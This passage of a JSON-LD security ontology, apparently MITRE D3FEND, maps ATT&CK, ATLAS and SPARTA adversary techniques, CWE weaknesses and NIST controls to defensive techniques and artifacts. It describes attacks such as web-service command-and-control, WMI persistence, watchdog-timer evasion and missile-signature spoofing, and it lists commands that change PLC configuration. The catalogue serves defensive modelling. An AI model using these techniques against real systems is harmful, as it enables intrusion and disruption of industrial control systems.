      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:DS0005",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers",
      "rdfs:comment": "This data source captures events relating to WMI objects and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "WMI (ATT&CK DS)"
    },
    {
      "@id": "d3f:MediaServer",
      "@type": "owl:Class",
      "d3f:definition": "A media server is a computer appliance or an application software that stores digital media (video, audio or images) and makes it available over a network. Media servers range from servers that provide video on demand to smaller personal computers or NAS (Network Attached Storage) for the home.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Media_server"
      },
      "rdfs:label": "Media Server",
      "rdfs:subClassOf": {
        "@id": "d3f:Server"
      }
    },
    {
      "@id": "d3f:T1066",
      "@type": "owl:Class",
      "d3f:attack-id": "T1066",
      "d3f:definition": "If a malicious tool is detected and quarantined or otherwise curtailed, an adversary may be able to determine why the malicious tool was detected (the indicator), modify the tool by removing the indicator, and use the updated version that is no longer detected by the target's defensive systems or subsequent targets that may use similar systems.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1027.005",
      "rdfs:label": "Indicator Removal from Tools",
      "rdfs:seeAlso": {
        "@id": "d3f:T1027.005"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:T1102.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1102.002",
      "d3f:definition": "Adversaries may use an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems can then send the output from those commands back over that Web service channel. The return traffic may occur in a variety of ways, depending on the Web service being utilized. For example, the return traffic may take the form of the compromised system posting a comment on a forum, issuing a pull request to a development project, updating a document hosted on a Web service, or by sending a Tweet.",
      "rdfs:label": "Bidirectional Communication",
      "rdfs:subClassOf": {
        "@id": "d3f:T1102"
      }
    },
    {
      "@id": "d3f:ServiceDisableEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event capturing the deactivation of a service application, preventing it from being started or accessed until re-enabled.",
      "rdfs:label": "Service Disable Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationDisableEvent"
        },
        {
          "@id": "d3f:ServiceEvent"
        },
        {
          "@id": "_:Nf6b800355281426b9b0df285f0d1e871"
        }
      ]
    },
    {
      "@id": "_:Nf6b800355281426b9b0df285f0d1e871",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ServiceEnableEvent"
      }
    },
    {
      "@id": "d3f:DE-0003.11",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.11",
      "d3f:definition": "By modifying watchdog parameters or who “pets” them, an adversary shapes what evidence survives. Extending or disabling timeouts allows long-running processes to operate without forced resets that would expose abnormal CPU or power usage; conversely, shortening windows or relocating the petting source to a low-level ISR can induce frequent resets that wipe volatile traces, break correlation in logs, and explain anomalies as “spurious reboots.” In both directions, the watchdog becomes a timing tool for hiding activity rather than a guardrail against it.",
      "d3f:modifies": {
        "@id": "d3f:WatchdogTimer"
      },
      "rdfs:label": "Watchdog Timer (WDT) for Evasion - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/11/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N57ba7af847834c62b2d7ca96b10cf8a7"
        }
      ],
      "skos:prefLabel": "Watchdog Timer (WDT) for Evasion"
    },
    {
      "@id": "_:N57ba7af847834c62b2d7ca96b10cf8a7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WatchdogTimer"
      }
    },
    {
      "@id": "d3f:ATLASCommandAndControlTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0014"
      },
      "rdfs:label": "Command and Control Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Nda3077c3051241abb60107029b5c3a86"
        }
      ],
      "skos:prefLabel": "Command and Control Technique"
    },
    {
      "@id": "_:Nda3077c3051241abb60107029b5c3a86",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0014"
      }
    },
    {
      "@id": "d3f:CWE-820",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-820",
      "d3f:definition": "The product utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource.",
      "rdfs:label": "Missing Synchronization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-662"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_20",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Information Flow Enforcement | Approved Solutions",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "rdfs:label": "AC-4(20)"
    },
    {
      "@id": "d3f:CWE-470",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-470",
      "d3f:definition": "The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code.",
      "d3f:synonym": "Reflection Injection",
      "rdfs:label": "Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-610"
        },
        {
          "@id": "d3f:CWE-913"
        }
      ]
    },
    {
      "@id": "d3f:GetRunningProcesses",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enumerates": {
        "@id": "d3f:Process"
      },
      "rdfs:label": "Get Running Processes",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nd6b11d8c099e4cbe99f8f1a10771b19a"
        }
      ]
    },
    {
      "@id": "_:Nd6b11d8c099e4cbe99f8f1a10771b19a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Process"
      }
    },
    {
      "@id": "d3f:PythonPackage",
      "@type": "owl:Class",
      "d3f:definition": "A Python package is an aggregation of many Python files - either in source code or in bytecode - and associated metadata and resources (text, images, etc.). Python packages can be distributed in different file formats.",
      "rdfs:label": "Python Package",
      "rdfs:seeAlso": {
        "@id": "https://packaging.python.org/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SoftwarePackage"
      }
    },
    {
      "@id": "d3f:T0811",
      "@type": "owl:Class",
      "d3f:attack-id": "T0811",
      "d3f:definition": "Adversaries may target and collect data from information repositories. This can include sensitive data such as specifications, schematics, or diagrams of control system layouts, devices, and processes. Examples of information repositories include reference databases in the process environment, as well as databases in the corporate network that might contain information about the ICS.(Citation: Cybersecurity & Infrastructure Security Agency March 2018)",
      "rdfs:label": "Data from Information Repositories - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "Data from Information Repositories"
    },
    {
      "@id": "d3f:AdministrativeNetworkActivityAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AdministrativeNetworkActivityAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:created": {
        "@type": "xsd:dateTime",
        "@value": "2020-08-05T00:00:00"
      },
      "d3f:d3fend-id": "D3-ANAA",
      "d3f:definition": "Detection of unauthorized use of administrative network protocols by analyzing network activity against a baseline.",
      "d3f:kb-article": "## How it works\nNetwork protocols such as RDP, IPMI, SSH, SNMP, VNC, MOSH, NX, TeamViewer, SPICE, PCoIP, and others are used by system administrators to remotely manage servers. Defenders monitor administrative network activity to determine if the use of remote protocols is malicious. Attackers can abuse administrative protocols and leverage them for initial access to various endpoints. For example, an attacker with valid credentials will remotely SSH or RDP into a server and attempt to blend in with existing traffic from system administrators. By monitoring the traffic activity, it is possible to detect when the protocols are behaving differently from a known baseline of system administration activity.\n\n## Considerations\n* Administrative traffic can be encrypted, making network protocol analysis a challenge\n* False alarms can be mitigated by integration with inventory management systems",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndSystemForDetectingSuspiciousAdministrativeActivity_VectraNetworksInc"
        },
        {
          "@id": "d3f:Reference-RemoteRegistry_MITRE"
        },
        {
          "@id": "d3f:Reference-WindowsRemoteManagement_WinRM_MITRE"
        }
      ],
      "rdfs:label": "Administrative Network Activity Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N9bf25e8673134ad0a8e653524c59fd73"
        }
      ]
    },
    {
      "@id": "_:N9bf25e8673134ad0a8e653524c59fd73",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:SecurityEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing occurrences related to cybersecurity, including detection, remediation, or enforcement actions. Security events provide critical insights into the state, behavior, and resilience of digital systems.",
      "rdfs:label": "Security Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:N117c0e5062eb4d04b93619eee064f236"
        }
      ]
    },
    {
      "@id": "_:N117c0e5062eb4d04b93619eee064f236",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:caused-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveAction"
      }
    },
    {
      "@id": "d3f:T1087.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1087.001",
      "d3f:definition": "Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.",
      "d3f:enumerates": {
        "@id": "d3f:LocalUserAccount"
      },
      "rdfs:label": "Local Account",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1087"
        },
        {
          "@id": "_:N483e7ac644cc4442a6b76251240cedd2"
        }
      ]
    },
    {
      "@id": "_:N483e7ac644cc4442a6b76251240cedd2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-491",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-491",
      "d3f:definition": "A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state.",
      "rdfs:label": "Public cloneable() Method Without Final ('Object Hijack')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CWE-146",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-146",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as expression or command delimiters when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Expression/Command Delimiters",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-140"
      }
    },
    {
      "@id": "d3f:ArtifactServer",
      "@type": "owl:Class",
      "d3f:definition": "A digital artifact server provides access services to digital artifacts in a repository.  It provides an associated set of data management, search and access methods allowing application-independent access to the content.",
      "rdfs:label": "Artifact Server",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Content_management"
        },
        {
          "@id": "dbr:Content_repository"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:WebServer"
      }
    },
    {
      "@id": "d3f:CWE-7",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-7",
      "d3f:definition": "The default error page of a web application should not display sensitive information about the product.",
      "rdfs:label": "J2EE Misconfiguration: Missing Custom Error Page",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-756"
      }
    },
    {
      "@id": "d3f:CWE-219",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-219",
      "d3f:definition": "The product stores sensitive data under the web document root with insufficient access control, which might make it accessible to untrusted parties.",
      "rdfs:label": "Storage of File with Sensitive Data Under Web Root",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-552"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SA-10_5",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Developer Configuration Management | Mapping Integrity for Version Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:related": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PlatformHardening"
        }
      ],
      "rdfs:label": "SA-10(5)"
    },
    {
      "@id": "d3f:ATTACKMobileCollectionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0035"
      },
      "rdfs:label": "Collection Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N4acc26f11f0d468dbf8af1113963d64b"
        }
      ],
      "skos:prefLabel": "Collection Technique"
    },
    {
      "@id": "_:N4acc26f11f0d468dbf8af1113963d64b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0035"
      }
    },
    {
      "@id": "d3f:DeepNeuralNetClassification",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DNNC",
      "d3f:definition": "A deep neural network (DNN) is an artificial neural network (ANN) with multiple layers between the input and output layers. There are different types of neural networks but they always consist of the same components: neurons, synapses, weights, biases, and functions. These components as a whole function similarly to a human brain, and can be trained like any other ML algorithm",
      "d3f:kb-article": "## References\nDeep learning. Wikipedia. [Link](https://en.wikipedia.org/wiki/Deep_learning).",
      "rdfs:label": "Deep Neural Network Classification",
      "rdfs:subClassOf": {
        "@id": "d3f:ArtificialNeuralNetClassification"
      }
    },
    {
      "@id": "d3f:ProcessCreationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a new process is spawned, initializing its execution context and resource allocation.",
      "rdfs:label": "Process Creation Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ProcessEvent"
        },
        {
          "@id": "_:N0c35fd51c842499a90ab22abb0d4897e"
        }
      ]
    },
    {
      "@id": "_:N0c35fd51c842499a90ab22abb0d4897e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessStartFunction"
      }
    },
    {
      "@id": "d3f:CCI-002281_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system maintains the association of organization-defined security attributes to organization-defined subjects.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002281"
    },
    {
      "@id": "d3f:ATLASReconnaissanceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0002"
      },
      "rdfs:label": "Reconnaissance Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:N0cc2433ea21249fcb236eb9547bcd0ff"
        }
      ],
      "skos:prefLabel": "Reconnaissance Technique"
    },
    {
      "@id": "_:N0cc2433ea21249fcb236eb9547bcd0ff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0002"
      }
    },
    {
      "@id": "d3f:ActiveLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-AL",
      "d3f:definition": "Active learning aims to improve learning efficiency by allowing the learning algorithm to select which data to learn from.",
      "d3f:kb-article": "## How it works\nTraditional supervised learning often requires a large number of labeled instances, which can be costly or time-consuming to obtain. Active learning addresses this labeling bottleneck by asking an oracle (e.g., a human annotator) to label selected unlabeled instances. The goal is to achieve high accuracy with minimal labeling effort.\n\n## Considerations\nActive learning is particularly useful in scenarios where data is abundant but labeled instances are scarce or expensive. Examples include speech recognition, information extraction, and document classification.\n\n## References\n- Wikipedia article on Active Learning (machine learning) [Link](https://en.wikipedia.org/wiki/Active_learning_(machine_learning))\n- Settles, B. (2009). Active Learning Literature Survey. [Link](https://burrsettles.com/pub/settles.activelearning.pdf)",
      "rdfs:label": "Active Learning",
      "rdfs:subClassOf": {
        "@id": "d3f:MachineLearning"
      }
    },
    {
      "@id": "d3f:OTModifyDeviceConfigurationCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Modify device configuration.",
      "rdfs:comment": [
        "BACnet: deviceCommunicationControl\nBACnet: reinitializeDevice ",
        "GE-SRTP: WRITE PROGRAM BLOCK MEMORY\nGE-SRTP: CHANGE PLC CPU PRIVILEGE LEVEL\nGE-SRTP: SET CONTROL ID(CPU ID)\nGE-SRTP: SET PLC (RUN VS STOP)\nGE-SRTP: PROGRAM STORE (UPLOAD FROM PLC)\nGE-SRTP: PROGRAM LOAD (DOWNLOAD TO PLC)\nGE-SRTP: TOGGLE FORCE SYSTEM MEMORY"
      ],
      "rdfs:label": "OT Modify Device Configuration Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:T0887",
      "@type": "owl:Class",
      "d3f:attack-id": "T0887",
      "d3f:definition": "Adversaries may seek to capture radio frequency (RF) communication used for remote control and reporting in distributed environments. RF communication frequencies vary between 3 kHz to 300 GHz, although are commonly between 300 MHz to 6 GHz. (Citation: Candell, R., Hany, M., Lee, K. B., Liu,Y., Quimby, J., Remley, K. April 2018)  The wavelength and frequency of the signal affect how the signal propagates through open air, obstacles (e.g. walls and trees) and the type of radio required to capture them. These characteristics are often standardized in the protocol and hardware and may have an effect on how the signal is captured. Some examples of wireless protocols that may be found in cyber-physical environments are: WirelessHART, Zigbee, WIA-FA, and 700 MHz Public Safety Spectrum.",
      "rdfs:label": "Wireless Sniffing - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSCollectionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSDiscoveryTechnique"
        }
      ],
      "skos:prefLabel": "Wireless Sniffing"
    },
    {
      "@id": "d3f:CWE-584",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-584",
      "d3f:definition": "The code has a return statement inside a finally block, which will cause any thrown exception in the try block to be discarded.",
      "rdfs:label": "Return Inside Finally Block",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-705"
      }
    },
    {
      "@id": "d3f:LinuxDeleteModule",
      "@type": "owl:Class",
      "d3f:definition": "Attempts to remove the unused loadable module entry identified by name. If the module has an exit function, then that function is executed before unloading the module.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/delete_module.2.html"
      },
      "rdfs:label": "Linux Delete Module",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIUnloadModule"
      }
    },
    {
      "@id": "d3f:CCI-002262_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in storage.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002262"
    },
    {
      "@id": "d3f:StringEquivalenceMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SEM",
      "d3f:definition": "String equivalence matching is a type of string pattern matching which is exact; that is, the strings being compared must have the same value for each character in their sequence and be of the same length.",
      "d3f:kb-article": "## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)\n2. Types of Equality. (2007, March 2). In _WikiWikiWeb_. [Link](https://wiki.c2.com/?TypesOfEquality)",
      "rdfs:label": "String Equivalence Matching",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EquivalenceMatching"
        },
        {
          "@id": "d3f:StringPatternMatching"
        }
      ]
    },
    {
      "@id": "d3f:WatchdogTimerExpirationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event indicating the watchdog timer was not serviced in time and triggers a reset or escalation action.",
      "rdfs:label": "Watchdog Timer Expiration Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WatchdogTimerEvent"
      }
    },
    {
      "@id": "d3f:d3fend-kb-data-property",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "x d3fend-kb-data-property y: The d3fend knowledge base object x has a data property y; e.g., a string capturing a particular aspect or section of a knowledge base article.",
      "rdfs:label": "d3fend-kb-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      }
    },
    {
      "@id": "d3f:CWE-223",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-223",
      "d3f:definition": "The product does not record or display information that would be important for identifying the source or nature of an attack, or determining if an action is safe.",
      "rdfs:label": "Omission of Security-relevant Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-221"
      }
    },
    {
      "@id": "d3f:FileMetadata",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information that describes and provides context about a file's content, structure, and attributes.",
      "rdfs:label": "File Metadata",
      "rdfs:subClassOf": {
        "@id": "d3f:Metadata"
      }
    },
    {
      "@id": "d3f:AML.T0029",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0029",
      "d3f:definition": "Adversaries may target AI-enabled systems with a flood of requests for the purpose of degrading or shutting down the service.\nSince many AI systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded.\nAdversaries can intentionally craft inputs that require heavy amounts of useless compute from the AI system.",
      "rdfs:label": "Denial of AI Service - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0029"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASImpactTechnique"
      },
      "skos:prefLabel": "Denial of AI Service"
    },
    {
      "@id": "d3f:ApplicationProtocolCommandAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ApplicationProtocolCommandAnalysis"
      ],
      "d3f:d3fend-id": "D3-APCA",
      "d3f:definition": "Analyzing application protocol level remote commands to detect unauthorized activity.",
      "d3f:kb-article": "## How it works\nThis technique requires the ability to parse application layer protocols to understand the commands being sent to a remote service. Signature-based or statistical analysis may be employed to identify unauthorized commands being sent. These commands can be observed by monitoring network traffic or application logs.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-MethodAndApparatusForDetectingAnomaliesOfAnInfrastructureInANetwork"
        },
        {
          "@id": "d3f:Reference-ProtocolBasedDetectionOfSuspiciousNetworkTraffic"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Application Protocol Command Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N2642975e82fd445e90d771ef48e3b15b"
        }
      ]
    },
    {
      "@id": "_:N2642975e82fd445e90d771ef48e3b15b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:EX-0014.05",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0014.05",
      "d3f:definition": "In this variant, attackers deploy decoys or emitters designed to mimic ballistic-missile signatures so early-warning and missile-defense systems allocate interceptors and attention to false targets. Decoys can shape radar cross-section and thermal profiles, stage deployment to simulate staging events, or use cooling/heating to emulate plume and body signatures, while coordinated timing and trajectories reinforce plausibility. The objective is resource depletion and distraction: saturate tracking, cueing, and discrimination so defenses are preoccupied prior to an actual strike or are left with reduced capacity afterward. Although the immediate target is the defense architecture, space-based sensors and their ground processing are integral to the effect; spoofed scenes enter the normal detection and tracking pipelines and propagate as authoritative truth until later discrimination overturns them.",
      "rdfs:label": "Ballistic Missile Spoof - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0014/05/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0014"
      },
      "skos:prefLabel": "Ballistic Missile Spoof"
    },
    {
      "@id": "d3f:CWE-1295",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1295",
      "d3f:definition": "The product fails to adequately prevent the revealing of unnecessary and potentially sensitive system information within debugging messages.",
      "rdfs:label": "Debug Messages Revealing Unnecessary Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1546.003",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1546.003",
      "d3f:definition": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user login, or the computer's uptime.(Citation: Mandiant M-Trends 2015)",
      "d3f:modifies": {
        "@id": "d3f:EventLog"
      },
      "d3f:produces": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "rdfs:label": "Windows Management Instrumentation Event Subscription",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1546"
        },
        {
          "@id": "_:N4b4b34f09d3249d38d982a9ec655e5d3"
        },
        {
          "@id": "_:N7543986d213f4c11a933b365833bec32"
        }
      ]
    },
    {
      "@id": "_:N4b4b34f09d3249d38d982a9ec655e5d3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EventLog"
      }
    },
    {
      "@id": "_:N7543986d213f4c11a933b365833bec32",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CCI-001145_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs, at a minimum, FIPS-validated cryptography to protect unclassified information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001145"
    },
    {
      "@id": "d3f:SavedInstructionPointer",
      "@type": "owl:Class",
      "d3f:definition": "A saved instruction pointer points to the instruction that generated an exception (trap or fault).",
      "rdfs:label": "Saved Instruction Pointer",
      "rdfs:seeAlso": {
        "@id": "dbr:Exception_handling"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Pointer"
        },
        {
          "@id": "d3f:StackComponent"
        }
      ]
    },
    {
      "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Modifies the running state of an application or program on a device.",
      "rdfs:label": "OT Modify Device Operating Mode Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommandEvent"
        },
        {
          "@id": "_:N591b09f22bf7495c8415f72ff308b675"
        },
        {
          "@id": "_:N1eed3bc54d0c40d48be63672fa884fe7"
        }
      ]
    },
    {
      "@id": "_:N591b09f22bf7495c8415f72ff308b675",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N1eed3bc54d0c40d48be63672fa884fe7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTModifyDeviceOperatingModeCommand"
      }
    },
    {
      "@id": "d3f:signed-by",
      "@type": "owl:ObjectProperty",
